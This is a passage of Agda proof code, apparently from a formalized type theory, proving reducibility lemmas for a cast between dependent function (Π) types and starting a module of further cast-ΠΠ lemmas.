F₁ x) (irrelevant-subst′ ρ F x) y₀ x₀ : Δ ⊢ (wk ρ (snd e)) ∘ x ^ ¹ ∷ Id (U ⁰) (wk (lift ρ) (wk1d G [ b (step id) (fst (wk1 e)) (var 0) ]) [ x ]) (wk (lift ρ) G₁ [ x ]) ^ [ % , ι ¹ ] x₀ = Twk.wkTerm [ρ] ⊢Δ ⊢snde ∘ⱼ ⊢x x₁ = PE.cong₂ (λ X Y → X [ Y ]) (cast-subst-lemma4 ρ x G) y₁ x₂ = PE.trans (singleSubstLift (wk (lift (lift ρ)) (wk1d G)) (wk (lift ρ) (b (step id) (fst (wk1 e)) (var 0)))) x₁ x₃ = PE.trans (PE.cong (λ X → X [ x ]) (wk-β {a = b (step id) (fst (wk1 e)) (var 0)} (wk1d G))) x₂ x₄ = PE.subst (λ X → Δ ⊢ snd (wk ρ e) ∘ x ^ ¹ ∷ Id (U ⁰) X (wk (lift ρ) G₁ [ x ]) ^ [ % , ι ¹ ]) x₃ x₀ in x₄ g = λ ρ x → cast ⁰ (wk (lift ρ) G [ b ρ (fst (wk ρ e)) x ]) (wk (lift ρ) G₁ [ x ]) ((snd (wk ρ e)) ∘ x ^ ¹) ((wk ρ t) ∘ (b ρ (fst (wk ρ e)) x) ^ ⁰) [g] : ∀ {ρ Δ x} → ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → ([x] : Δ ⊩⟨ ι ⁰ ⟩ x ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) → Δ ⊩⟨ ι ⁰ ⟩ g ρ x ∷ wk (lift ρ) G₁ [ x ] ^ [ ! , ι ⁰ ] / [G₁] [ρ] ⊢Δ [x] [g] {ρ} {Δ} {x} [ρ] ⊢Δ [x] = let [b]′ = [b] [ρ] ⊢Δ (Twk.wkTerm [ρ] ⊢Δ ⊢fste) [x] [t] = proj₁ (redSubstTerm (appRed (escapeTerm ([F] [ρ] ⊢Δ) [b]′) (Twk.wkRedTerm [ρ] ⊢Δ Df)) ([G] [ρ] ⊢Δ [b]′) ([f] [ρ] ⊢Δ [b]′)) in recursor [ρ] ⊢Δ [b]′ [x] [t] (⊢snde′ [ρ] ⊢Δ (escapeTerm ([F₁] [ρ] ⊢Δ) [x])) [gext] : ∀ {ρ Δ x y} → ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → ([x] : Δ ⊩⟨ ι ⁰ ⟩ x ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) → ([y] : Δ ⊩⟨ ι ⁰ ⟩ y ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) → ([x≡y] : Δ ⊩⟨ ι ⁰ ⟩ x ≡ y ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) → Δ ⊩⟨ ι ⁰ ⟩ g ρ x ≡ g ρ y ∷ wk (lift ρ) G₁ [ x ] ^ [ ! , ι ⁰ ] / [G₁] [ρ] ⊢Δ [x] [gext] {ρ} {Δ} {x} {y} [ρ] ⊢Δ [x] [y] [x≡y] = let [b₁] = [b] [ρ] ⊢Δ (Twk.wkTerm [ρ] ⊢Δ ⊢fste) [x] [b₂] = [b] [ρ] ⊢Δ (Twk.wkTerm [ρ] ⊢Δ ⊢fste) [y] [b₁≡b₂] = [bext] [ρ] ⊢Δ (Twk.wkTerm [ρ] ⊢Δ ⊢fste) (Twk.wkTerm [ρ] ⊢Δ ⊢fste) [x] [y] [x≡y] D₁ = (appRed (escapeTerm ([F] [ρ] ⊢Δ) [b₁]) (Twk.wkRedTerm [ρ] ⊢Δ Df)) D₂ = (appRed (escapeTerm ([F] [ρ] ⊢Δ) [b₂]) (Twk.wkRedTerm [ρ] ⊢Δ Df)) [t₁] = proj₁ (redSubstTerm D₁ ([G] [ρ] ⊢Δ [b₁]) ([f] [ρ] ⊢Δ [b₁])) [t₂] = proj₁ (redSubstTerm D₂ ([G] [ρ] ⊢Δ [b₂]) ([f] [ρ] ⊢Δ [b₂])) [t₁≡t₂] = redSubstEqTerm D₁ D₂ ([G] [ρ] ⊢Δ [b₁]) ([G] [ρ] ⊢Δ [b₂]) (G-ext [ρ] ⊢Δ [b₁] [b₂] [b₁≡b₂]) ([f] [ρ] ⊢Δ [b₁]) ([f] [ρ] ⊢Δ [b₂]) ([fext] [ρ] ⊢Δ [b₁] [b₂] [b₁≡b₂]) in extrecursor [ρ] ⊢Δ [b₁] [b₂] [b₁≡b₂] [x] [y] [x≡y] [t₁] [t₂] [t₁≡t₂] (⊢snde′ [ρ] ⊢Δ (escapeTerm ([F₁] [ρ] ⊢Δ) [x])) (⊢snde′ [ρ] ⊢Δ (escapeTerm ([F₁] [ρ] ⊢Δ) [y])) Δ₁ = Γ ∙ F₁ ^ [ rF , ι ⁰ ] ⊢Δ₁ : ⊢ Δ₁ ⊢Δ₁ = ⊢Γ ∙ ⊢F₁ ρ₁ = (step id) [ρ₁] : ρ₁ Twk.∷ Δ₁ ⊆ Γ [ρ₁] = Twk.step Twk.id [0] : Δ₁ ⊩⟨ ι ⁰ ⟩ var 0 ∷ wk ρ₁ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ₁] ⊢Δ₁ [0] = neuTerm ([F₁] [ρ₁] ⊢Δ₁) (var 0) (var ⊢Δ₁ here) (~-var (var ⊢Δ₁ here)) ⊢g0 = PE.subst (λ X → Δ₁ ⊢ g (step id) (var 0) ∷ X ^ [ ! , ι ⁰ ]) (wkSingleSubstId G₁) (escapeTerm ([G₁] [ρ₁] ⊢Δ₁ [0]) ([g] [ρ₁] ⊢Δ₁ [0])) ⊢λg : Γ ⊢ lam F₁ ▹ g (step id) (var 0) ^ ⁰ ∷ Π F₁ ^ rF ° ⁰ ▹ G₁ ° ⁰ ° ⁰ ^ [ ! , ι ⁰ ] ⊢λg = lamⱼ (≡is≤ PE.refl) (≡is≤ PE.refl) ⊢F₁ ⊢g0 Dg : Γ ⊢ cast ⁰ A B e t :⇒: (lam F₁ ▹ g (step id) (var 0) ^ ⁰) ∷ Π F₁ ^ rF ° ⁰ ▹ G₁ ° ⁰ ° ⁰ ^ ι ⁰ Dg = let g0 = lam F₁ ▹ cast ⁰ (G [ b (step id) (fst (wk1 e)) (var 0) ]↑) G₁ ((snd (wk1 e)) ∘ (var 0) ^ ¹) ((wk1 t) ∘ (b (step id) (fst (wk1 e)) (var 0)) ^ ⁰) ^ ⁰ g≡g : g0 PE.≡ lam F₁ ▹ g (step id) (var 0) ^ ⁰ g≡g = PE.cong₂ (λ X Y → lam F₁ ▹ cast ⁰ X Y ((snd (wk1 e)) ∘ (var 0) ^ ¹) ((wk1 t) ∘ (b (step id) (fst (wk1 e)) (var 0)) ^ ⁰) ^ ⁰) (wk1d[]-[]↑ G (b (step id) (fst (wk1 e)) (var 0))) (PE.sym (wkSingleSubstId G₁)) ⊢e′ = conv ⊢e (univ (Id-cong (refl (univ 0<1 ⊢Γ)) (un-univ≡ (subset D)) (refl (un-univ ⊢B)))) ⊢e″ = conv ⊢e (univ (Id-cong (refl (univ 0<1 ⊢Γ)) (un-univ≡ (subset* D)) (un-univ≡ (subset* D₁)))) in [[ conv (castⱼ (un-univ ⊢A) (un-univ ⊢B) ⊢e (conv ⊢t (sym (subset* D)))) (subset* D₁) , ⊢λg , (conv* (CastRedTerm′ ⊢B ⊢e (conv ⊢t (sym (subset D))) D ⇨∷* castΠRed* ⊢F ⊢G ⊢e′ ⊢t D₁) (subset* D₁)) ⇨∷* (PE.subst (λ X → Γ ⊢ cast ⁰ (Π F ^ rF ° ⁰ ▹ G ° ⁰ ° ⁰) (Π F₁ ^ rF ° ⁰ ▹ G₁ ° ⁰ ° ⁰) e t ⇒ X ∷ Π F₁ ^ rF ° ⁰ ▹ G₁ ° ⁰ ° ⁰ ^ ι ⁰) g≡g (cast-Π (un-univ ⊢F) (un-univ ⊢G) (un-univ ⊢F₁) (un-univ ⊢G₁) ⊢e″ ⊢t) ⇨ (id ⊢λg)) ]] g≡g : Γ ⊢ (lam F₁ ▹ g (step id) (var 0) ^ ⁰) ≅ (lam F₁ ▹ g (step id) (var 0) ^ ⁰) ∷ Π F₁ ^ rF ° ⁰ ▹ G₁ ° ⁰ ° ⁰ ^ [ ! , ι ⁰ ] g≡g = let ⊢F₁′ = Twk.wk (Twk.step Twk.id) ⊢Δ₁ ⊢F₁ ⊢g0 = escapeTerm ([G₁] [ρ₁] ⊢Δ₁ [0]) ([g] [ρ₁] ⊢Δ₁ [0]) ⊢g0′ = (PE.subst (λ X → Δ₁ ⊢ g (step id) (var 0) ∷ X ^ [ ! , ι ⁰ ]) (wkSingleSubstId G₁) ⊢g0) ⊢g0″ = Twk.wkTerm (Twk.lift (Twk.step Twk.id)) (⊢Δ₁ ∙ ⊢F₁′) ⊢g0′ D : Δ₁ ⊢ (lam (wk1 F₁) ▹ wk1d (g (step id) (var 0)) ^ ⁰) ∘ (var 0) ^ ⁰ ⇒* g (step id) (var 0) ∷ wk1d G₁ [ var 0 ] ^ ι ⁰ D = PE.subst (λ X → Δ₁ ⊢ (lam (wk1 F₁) ▹ wk1d (g (step id) (var 0)) ^ ⁰) ∘ (var 0) ^ ⁰ ⇒ X ∷ wk1d G₁ [ var 0 ] ^ ι ⁰) (wkSingleSubstId (g (step id) (var 0))) (β-red (≡is≤ PE.refl) (≡is≤ PE.refl) ⊢F₁′ ⊢g0″ (var ⊢Δ₁ here)) ⇨ id ⊢g0 [g0] : Δ₁ ⊩⟨ ι ⁰ ⟩ (lam (wk1 F₁) ▹ wk1d (g (step id) (var 0)) ^ ⁰) ∘ (var 0) ^ ⁰ ∷ wk1d G₁ [ var 0 ] ^ [ ! , ι ⁰ ] / [G₁] [ρ₁] ⊢Δ₁ [0] [g0] = proj₁ (redSubstTerm D ([G₁] [ρ₁] ⊢Δ₁ [0]) ([g] [ρ₁] ⊢Δ₁ [0])) x₀ = escapeEqReflTerm ([G₁] [ρ₁] ⊢Δ₁ [0]) [g0] x₁ = PE.subst (λ X → Δ₁ ⊢ (lam (wk1 F₁) ▹ wk1d (g (step id) (var 0)) ^ ⁰) ∘ (var 0) ^ ⁰ ≅ (lam (wk1 F₁) ▹ wk1d (g (step id) (var 0)) ^ ⁰) ∘ (var 0) ^ ⁰ ∷ X ^ [ ! , ι ⁰ ]) (wkSingleSubstId G₁) x₀ in ≅-η-eq (≡is≤ PE.refl) (≡is≤ PE.refl) ⊢F₁ ⊢λg ⊢λg lamₙ lamₙ x₁ g∘a≡ga : ∀ {ρ Δ a} → ([ρ] : ρ Twk.∷ Δ ⊆ Γ) → (⊢Δ : ⊢ Δ) → ([a] : Δ ⊩⟨ ι ⁰ ⟩ a ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) → Δ ⊢ wk ρ (lam F₁ ▹ g (step id) (var 0) ^ ⁰) ∘ a ^ ⁰ ⇒ g ρ a ∷ wk (lift ρ) G₁ [ a ] ^ ι ⁰ g∘a≡ga {ρ} {Δ} {a} [ρ] ⊢Δ [a] = let ⊢F₁′ = (Twk.wk [ρ] ⊢Δ ⊢F₁) -- this lemma is already in ⊢snde′. maybe refactor? x₀ : wk (lift ρ) (b (step id) (fst (wk1 e)) (var 0)) [ a ] PE.≡ b ρ (fst (wk ρ e)) a x₀ = PE.trans (PE.cong (λ X → cast ⁰ (wk (lift ρ) (wk1 F₁) [ a ]) (wk (lift ρ) (wk1 F) [ a ]) X a) (PE.trans (PE.cong (λ X → X [ a ]) (wk-Idsym (lift ρ) (Univ rF ⁰) (wk1 F) (wk1 F₁) (fst (wk1 e)))) (subst-Idsym (sgSubst a) (Univ rF ⁰) (wk (lift ρ) (wk1 F)) (wk (lift ρ) (wk1 F₁)) (fst (wk (lift ρ) (wk1 e)))))) (PE.cong₃ (λ X Y Z → cast ⁰ Y X (Idsym (Univ rF ⁰) X Y (fst Z)) a) (irrelevant-subst′ ρ F a) (irrelevant-subst′ ρ F₁ a) (irrelevant-subst′ ρ e a)) x₁ : wk (lift ρ) (g (step id) (var 0)) [ a ] PE.≡ g ρ a x₁ = PE.cong₄ (λ X Y Z T → cast ⁰ X Y Z T) (PE.trans (cast-subst-lemma6 ρ G _ a) (PE.cong (λ X → wk (lift ρ) G [ X ]) x₀)) (PE.cong (λ X → wk (lift ρ) X [ a ]) (wkSingleSubstId G₁)) (PE.cong (λ X → snd X ∘ a ^ ¹) (irrelevant-subst′ ρ e a)) (PE.cong₂ (λ X Y → X ∘ Y ^ ⁰) (irrelevant-subst′ ρ t a) x₀) x₂ : Δ ∙ (wk ρ F₁) ^ [ rF , ι ⁰ ] ⊢ wk (lift ρ) (g (step id) (var 0)) ∷ wk (lift ρ) G₁ ^ [ ! , ι ⁰ ] x₂ = Twk.wkTerm (Twk.lift [ρ]) (⊢Δ ∙ ⊢F₁′) ⊢g0 in PE.subst (λ X → Δ ⊢ wk ρ (lam F₁ ▹ g (step id) (var 0) ^ ⁰) ∘ a ^ ⁰ ⇒ X ∷ wk (lift ρ) G₁ [ a ] ^ ι ⁰) x₁ (β-red (≡is≤ PE.refl) (≡is≤ PE.refl) ⊢F₁′ x₂ (escapeTerm ([F₁] [ρ] ⊢Δ) [a])) ⇨ id (escapeTerm ([G₁] [ρ] ⊢Δ [a]) ([g] [ρ] ⊢Δ [a])) [castΠΠ] : Γ ⊩⟨ ι ⁰ ⟩ cast ⁰ A B e t ∷ B ^ [ ! , ι ⁰ ] / (Πᵣ′ rF ⁰ ⁰ (≡is≤ PE.refl) (≡is≤ PE.refl) F₁ G₁ [[ ⊢B , ⊢ΠF₁G₁ , D₁ ]] ⊢F₁ ⊢G₁ A₁≡A₁ [F₁] [G₁] G₁-ext) [castΠΠ] = ((lam F₁ ▹ g (step id) (var 0) ^ ⁰) , Dg , lamₙ , g≡g , (λ [ρ] ⊢Δ [a] [a′] [a≡a′] → redSubstEqTerm (g∘a≡ga [ρ] ⊢Δ [a]) (g∘a≡ga [ρ] ⊢Δ [a′]) ([G₁] [ρ] ⊢Δ [a]) ([G₁] [ρ] ⊢Δ [a′]) (G₁-ext [ρ] ⊢Δ [a] [a′] [a≡a′]) ([g] [ρ] ⊢Δ [a]) ([g] [ρ] ⊢Δ [a′]) ([gext] [ρ] ⊢Δ [a] [a′] [a≡a′])) , (λ [ρ] ⊢Δ [a] → proj₁ (redSubstTerm (g∘a≡ga [ρ] ⊢Δ [a]) ([G₁] [ρ] ⊢Δ [a]) ([g] [ρ] ⊢Δ [a])))) module cast-ΠΠ-lemmas-3 {Γ A₁ A₂ A₃ A₄ F₁ F₂ F₃ F₄ rF G₁ G₂ G₃ G₄ e₁₃ e₂₄ t₁ f₁ t₂ f₂} (⊢Γ : ⊢ Γ) (⊢A₁ : Γ ⊢ A₁ ^ [ ! , ι ⁰ ]) (⊢ΠF₁G₁ : Γ ⊢ Π F₁ ^ rF ° ⁰ ▹ G₁ ° ⁰ ° ⁰ ^ [ ! , ι ⁰ ]) (D₁ : Γ ⊢ A₁ ⇒* Π F₁ ^ rF ° ⁰ ▹ G₁ ° ⁰ ° ⁰ ^ [ ! , ι ⁰ ]) (⊢F₁ : Γ ⊢ F₁ ^ [ rF , ι ⁰ ]) (⊢G₁ : (Γ ∙ F₁ ^ [ rF , ι ⁰ ]) ⊢ G₁ ^ [ ! , ι ⁰ ]) (A₁≡A₁ : Γ ⊢ (Π F₁ ^ rF ° ⁰ ▹ G₁ ° ⁰ ° ⁰) ≅ (Π F₁ ^ rF ° ⁰ ▹ G₁ ° ⁰ ° ⁰) ^ [ ! , ι ⁰ ]) ([F₁] : ∀ {ρ} {Δ} ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → Δ ⊩⟨ ι ⁰ ⟩ wk ρ F₁ ^ [ rF , ι ⁰ ]) ([G₁] : ∀ {ρ} {Δ} {a} ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) ([a] : Δ ⊩⟨ ι ⁰ ⟩ a ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / ([F₁] [ρ] ⊢Δ)) → (Δ ⊩⟨ ι ⁰ ⟩ wk (lift ρ) G₁ [ a ] ^ [ ! , ι ⁰ ])) (G₁-ext : ∀ {ρ} {Δ} {a} {b} ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) ([a] : Δ ⊩⟨ ι ⁰ ⟩ a ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / ([F₁] [ρ] ⊢Δ)) ([b] : Δ ⊩⟨ ι ⁰ ⟩ b ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / ([F₁] [ρ] ⊢Δ)) ([a≡b] : Δ ⊩⟨ ι ⁰ ⟩ a ≡ b ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / ([F₁] [ρ] ⊢Δ)) → (Δ ⊩⟨ ι ⁰ ⟩ wk (lift ρ) G₁ [ a ] ≡ wk (lift ρ) G₁ [ b ] ^ [ ! , ι ⁰ ] / ([G₁] [ρ] ⊢Δ [a]))) (⊢A₂ : Γ ⊢ A₂ ^ [ ! , ι ⁰ ]) (⊢ΠF₂G₂ : Γ ⊢ Π F₂ ^ rF ° ⁰ ▹ G₂ ° ⁰ ° ⁰ ^ [ ! , ι ⁰ ]) (D₂ : Γ ⊢ A₂ ⇒* Π F₂ ^ rF ° ⁰ ▹ G₂ ° ⁰ ° ⁰ ^ [ ! , ι ⁰ ]) (⊢F₂ : Γ ⊢ F₂ ^ [ rF , ι ⁰ ]) (⊢G₂ : (Γ ∙ F₂ ^ [ rF , ι ⁰ ]) ⊢ G₂ ^ [ ! , ι ⁰ ]) (A₂≡A₂ : Γ ⊢ (Π F₂ ^ rF ° ⁰ ▹ G₂ ° ⁰ ° ⁰) ≅ (Π F₂ ^ rF ° ⁰ ▹ G₂ ° ⁰ ° ⁰) ^ [ ! , ι ⁰ ]) ([F₂] : ∀ {ρ} {Δ} ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → Δ ⊩⟨ ι ⁰ ⟩ wk ρ F₂ ^ [ rF , ι ⁰ ]) ([G₂] : ∀ {ρ} {Δ} {a} ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) ([a] : Δ ⊩⟨ ι ⁰ ⟩ a ∷ wk ρ F₂ ^ [ rF , ι ⁰ ] / ([F₂] [ρ] ⊢Δ)) → (Δ ⊩⟨ ι ⁰ ⟩ wk (lift ρ) G₂ [ a ] ^ [ ! , ι ⁰ ])) (G₂-ext : ∀ {ρ} {Δ} {a} {b} ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) ([a] : Δ ⊩⟨ ι ⁰ ⟩ a ∷ wk ρ F₂ ^ [ rF , ι ⁰ ] / ([F₂] [ρ] ⊢Δ)) ([b] : Δ ⊩⟨ ι ⁰ ⟩ b ∷ wk ρ F₂ ^ [ rF , ι ⁰ ] / ([F₂] [ρ] ⊢Δ)) ([a≡b] : Δ ⊩⟨ ι ⁰ ⟩ a ≡ b ∷ wk ρ F₂ ^ [ rF , ι ⁰ ] / ([F₂] [ρ] ⊢Δ)) → (Δ ⊩⟨ ι ⁰ ⟩ wk (lift ρ) G₂ [ a ] ≡ wk (lift ρ) G₂ [ b ] ^ [ ! , ι ⁰ ] / ([G₂] [ρ] ⊢Δ [a]))) (⊢A₃ : Γ ⊢ A₃ ^ [ ! , ι ⁰ ]) (⊢ΠF₃G₃ : Γ ⊢ Π F₃ ^ rF ° ⁰ ▹ G₃ ° ⁰ ° ⁰ ^ [ ! , ι ⁰ ]) (D₃ : Γ ⊢ A₃ ⇒* Π F₃ ^ rF ° ⁰ ▹ G₃ ° ⁰ ° ⁰ ^ [ ! , ι ⁰ ]) (⊢F₃ : Γ ⊢ F₃ ^ [ rF , ι ⁰ ]) (⊢G₃ : (Γ ∙ F₃ ^ [ rF , ι ⁰ ]) ⊢ G₃ ^ [ ! , ι ⁰ ]) (A₃≡A₃ : Γ ⊢ (Π F₃ ^ rF ° ⁰ ▹ G₃ ° ⁰ ° ⁰) ≅ (Π F₃ ^ rF ° ⁰ ▹ G₃ ° ⁰ ° ⁰) ^ [ ! , ι ⁰ ]) ([F₃] : ∀ {ρ} {Δ} ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → Δ ⊩⟨ ι ⁰ ⟩ wk ρ F₃ ^ [ rF , ι ⁰ ]) ([G₃] : ∀ {ρ} {Δ} {a} ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) ([a] : Δ ⊩⟨ ι ⁰ ⟩ a ∷ wk ρ F₃ ^ [ rF , ι ⁰ ] / ([F₃] [ρ] ⊢Δ)) → (Δ ⊩⟨ ι ⁰ ⟩ wk (lift ρ) G₃ [ a ] ^ [ ! , ι ⁰ ])) (G₃-ext : ∀ {ρ} {Δ} {a} {b} ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) ([a] : Δ ⊩⟨ ι ⁰ ⟩ a ∷ wk ρ F₃ ^ [ rF , ι ⁰ ] / ([F₃] [ρ] ⊢Δ)) ([b] : Δ ⊩⟨ ι ⁰ ⟩ b ∷ wk ρ F₃ ^ [ rF , ι ⁰ ] / ([F₃] [ρ] ⊢Δ)) ([a≡b] : Δ ⊩⟨ ι ⁰ ⟩ a ≡ b ∷ wk ρ F₃ ^ [ rF , ι ⁰ ] / ([F₃] [ρ] ⊢Δ)) → (Δ ⊩⟨ ι ⁰ ⟩ wk (lift ρ) G₃ [ a ] ≡ wk (lift ρ) G₃ [ b ] ^ [ ! , ι ⁰ ] / ([G₃] [ρ] ⊢Δ [a]))) (⊢A₄ : Γ ⊢ A₄ ^ [ ! , ι ⁰ ]) (⊢ΠF₄G₄ : Γ ⊢ Π F₄ ^ rF ° ⁰ ▹ G₄ ° ⁰ ° ⁰ ^ [ ! , ι ⁰ ]) (D₄ : Γ ⊢ A₄ ⇒* Π F₄ ^ rF ° ⁰ ▹ G₄ ° ⁰ ° ⁰ ^ [ ! , ι ⁰ ]) (⊢F₄ : Γ ⊢ F₄ ^ [ rF , ι ⁰ ]) (⊢G₄ : (Γ ∙ F₄ ^ [ rF , ι ⁰ ]) ⊢ G₄ ^ [ ! , ι ⁰ ]) (A₄≡A₄ : Γ ⊢ (Π F₄ ^ rF ° ⁰ ▹ G₄ ° ⁰ ° ⁰) ≅ (Π F₄ ^ rF ° ⁰ ▹ G₄ ° ⁰ ° ⁰) ^ [ ! , ι ⁰ ]) ([F₄] : ∀ {ρ} {Δ} ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → Δ ⊩⟨ ι ⁰ ⟩ wk ρ F₄ ^ [ rF , ι ⁰ ]) ([G₄] : ∀ {ρ} {Δ} {a} ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) ([a] : Δ ⊩⟨ ι ⁰ ⟩ a ∷ wk ρ F₄ ^ [ rF , ι ⁰ ] / ([F₄] [ρ] ⊢Δ)) → (Δ ⊩⟨ ι ⁰ ⟩ wk (lift ρ) G₄ [ a ] ^ [ ! , ι ⁰ ])) (G₄-ext : ∀ {ρ} {Δ} {a} {b} ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) ([a] : Δ ⊩⟨ ι ⁰ ⟩ a ∷ wk ρ F₄ ^ [ rF , ι ⁰ ] / ([F₄] [ρ] ⊢Δ)) ([b] : Δ ⊩⟨ ι ⁰ ⟩ b ∷ wk ρ F₄ ^ [ rF , ι ⁰ ] / ([F₄] [ρ] ⊢Δ)) ([a≡b] : Δ ⊩⟨ ι ⁰ ⟩ a ≡ b ∷ wk ρ F₄ ^ [ rF , ι ⁰ ] / ([F₄] [ρ] ⊢Δ)) → (Δ ⊩⟨ ι ⁰ ⟩ wk (lift ρ) G₄ [ a ] ≡ wk (lift ρ) G₄ [ b ] ^ [ ! , ι ⁰ ] / ([G₄] [ρ] ⊢Δ [a]))) (A₁≡A₂ : Γ ⊢ Π F₁ ^ rF ° ⁰ ▹ G₁ ° ⁰ ° ⁰ ≅ Π F₂ ^ rF ° ⁰ ▹ G₂ ° ⁰ ° ⁰ ^ [ ! , ι ⁰ ]) (A₃≡A₄ : Γ ⊢ Π F₃ ^ rF ° ⁰ ▹ G₃ ° ⁰ ° ⁰ ≅ Π F₄ ^ rF ° ⁰ ▹ G₄ ° ⁰ ° ⁰ ^ [ ! , ι ⁰ ]) ([F₁≡F₂] : ∀ {ρ Δ} → ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → Δ ⊩⟨ ι ⁰ ⟩ wk ρ F₁ ≡ wk ρ F₂ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) ([F₃≡F₄] : ∀ {ρ Δ} → ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → Δ ⊩⟨ ι ⁰ ⟩ wk ρ F₃ ≡ wk ρ F₄ ^ [ rF , ι ⁰ ] / [F₃] [ρ] ⊢Δ) ([G₁≡G₂] : ∀ {ρ Δ a} → ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → ([a] : Δ ⊩⟨ ι ⁰ ⟩ a ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) → Δ ⊩⟨ ι ⁰ ⟩ wk (lift ρ) G₁ [ a ] ≡ wk (lift ρ) G₂ [ a ] ^ [ ! , ι ⁰ ] / [G₁] [ρ] ⊢Δ [a]) ([G₃≡G₄] : ∀ {ρ Δ a} → ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → ([a] : Δ ⊩⟨ ι ⁰ ⟩ a ∷ wk ρ F₃ ^ [ rF , ι ⁰ ] / [F₃] [ρ] ⊢Δ) → Δ ⊩⟨ ι ⁰ ⟩ wk (lift ρ) G₃ [ a ] ≡ wk (lift ρ) G₄ [ a ] ^ [ ! , ι ⁰ ] / [G₃] [ρ] ⊢Δ [a]) (⊢e₁₃ : Γ ⊢ e₁₃ ∷ Id (U ⁰) A₁ A₃ ^ [ % , ι ¹ ]) (⊢e₂₄ : Γ ⊢ e₂₄ ∷ Id (U ⁰) A₂ A₄ ^ [ % , ι ¹ ]) (⊢t₁ : Γ ⊢ t₁ ∷ Π F₁ ^ rF ° ⁰ ▹ G₁ ° ⁰ ° ⁰ ^ [ ! , ι ⁰ ]) (Df₁ : Γ ⊢ t₁ ⇒* f₁ ∷ Π F₁ ^ rF ° ⁰ ▹ G₁ ° ⁰ ° ⁰ ^ ι ⁰) ([f₁ext] : ∀ {ρ Δ a b} → ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) ([a] : Δ ⊩⟨ ι ⁰ ⟩ a ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) ([b] : Δ ⊩⟨ ι ⁰ ⟩ b ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) ([a≡b] : Δ ⊩⟨ ι ⁰ ⟩ a ≡ b ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) → Δ ⊩⟨ ι ⁰ ⟩ wk ρ f₁ ∘ a ^ ⁰ ≡ wk ρ f₁ ∘ b ^ ⁰ ∷ wk (lift ρ) G₁ [ a ] ^ [ ! , ι ⁰ ] / [G₁] [ρ] ⊢Δ [a]) ([f₁] : ∀ {ρ Δ a} → ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → ([a] : Δ ⊩⟨ ι ⁰ ⟩ a ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) → Δ ⊩⟨ ι ⁰ ⟩ wk ρ f₁ ∘ a ^ ⁰ ∷ wk (lift ρ) G₁ [ a ] ^ [ ! , ι ⁰ ] / [G₁] [ρ] ⊢Δ [a]) (⊢t₂ : Γ ⊢ t₂ ∷ Π F₂ ^ rF ° ⁰ ▹ G₂ ° ⁰ ° ⁰ ^ [ ! , ι ⁰ ]) (Df₂ : Γ ⊢ t₂ ⇒* f₂ ∷ Π F₂ ^ rF ° ⁰ ▹ G₂ ° ⁰ ° ⁰ ^ ι ⁰) ([f₂ext] : ∀ {ρ Δ a b} → ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) ([a] : Δ ⊩⟨ ι ⁰ ⟩ a ∷ wk ρ F₂ ^ [ rF , ι ⁰ ] / [F₂] [ρ] ⊢Δ) ([b] : Δ ⊩⟨ ι ⁰ ⟩ b ∷ wk ρ F₂ ^ [ rF , ι ⁰ ] / [F₂] [ρ] ⊢Δ) ([a≡b] : Δ ⊩⟨ ι ⁰ ⟩ a ≡ b ∷ wk ρ F₂ ^ [ rF , ι ⁰ ] / [F₂] [ρ] ⊢Δ) → Δ ⊩⟨ ι ⁰ ⟩ wk ρ f₂ ∘ a ^ ⁰ ≡ wk ρ f₂ ∘ b ^ ⁰ ∷ wk (lift ρ) G₂ [ a ] ^ [ ! , ι ⁰ ] / [G₂] [ρ] ⊢Δ [a]) ([f₂] : ∀ {ρ Δ a} → ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → ([a] : Δ ⊩⟨ ι ⁰ ⟩ a ∷ wk ρ 